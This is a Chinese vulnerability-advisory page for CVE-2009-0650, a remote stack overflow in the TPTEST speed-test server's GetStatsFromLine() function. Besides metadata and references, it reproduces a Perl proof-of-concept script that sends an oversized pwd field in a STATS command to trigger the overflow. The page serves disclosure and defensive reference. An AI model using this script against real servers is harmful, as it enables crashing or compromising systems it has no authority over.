TPTEST GetStatsFromLine()函数远程栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117403 漏洞类型 缓冲区溢出
发布时间 2009-02-16 更新时间 2009-02-23
CVE编号 CVE-2009-0650 CNNVD-ID CNNVD-200902-472
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/8058
https://cxsecurity.com/issue/WLB-2009020237
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-472
|漏洞详情
TPTEST是用于测试Internet连接速度的工具。TPTEST的engine/tpcommon.c或src/net/tpcommon.cpp文件的GetStatsFromLine()函数在处理STATS命令时存在栈溢出漏洞。如果远程攻击者向服务器发送了带有超长email或pwd标签字段的STATS行的话,就可以触发这个溢出,导致执行任意代码。
|漏洞EXP
#!/usr/local/bin/perl

# TPTEST <= 3.1.7 (maby also 5.0.2?)
# tptest.sourceforge.net
# stackbased buffer overflow poc in server (client can also be exploit)
# author: ffwd

use IO::Socket;($host,$port)=@ARGV;
$rem=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>$port);
if(!$rem){die "1\n";}$rem->autoflush(1);
$cookie=$major=$minor="123";
$r=<$rem>;print "$r";sleep 5; # to attach in gdb..
if($r=~/cookie=([0-9]*)/){$cookie=$1;}
if($r=~/vmajor=([0-9]*)/){$major=$1;}
if($r=~/vminor=([0-9]*)/){$minor=$1;}
$s="TEST vmajor=$major;vminor=$minor;mode=4;timeout=60;tcpbytes=0;cookie=$cookie;client=\r\n";
print "$s";print $rem "$s";$rr=<$rem>;print "$rr";
if($rr=~/^210 tcpdataport=([0-9]*)/)
{$data=$1;$remm=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>$data);
if(!$remm){die "2\n";}}
$ss="STATS majorv=$major;minorv=$minor;pktssent=0;pktsunsent=0;pktsrcvd=0;bytessent=51200;bytesrcvd=0;".
"maxrtt=0;minrtt=999999999;totrtt=0;nortt=0;oocount=0;txstart_s=7274757975;txstart_us=717574;".
"txstop_s=7274757975;txstop_us=717173;rxstart_s=0;rxstart_us=0;rxstop_s=0;rxstop_us=0;email=;pwd=".
("A"x42)."\r\n"; # buffer overflow!
print "$ss";print $rem "$ss";
print while <$rem>;

# milw0rm.com [2009-02-16]
|参考资料

来源:XF
名称:tptest-pwd-bo(48781)
链接:http://xforce.iss.net/xforce/xfdb/48781
来源:BID
名称:33785
链接:http://www.securityfocus.com/bid/33785
来源:MILW0RM
名称:8058
链接:http://www.milw0rm.com/exploits/8058
来源:SECUNIA
名称:33972
链接:http://secunia.com/advisories/33972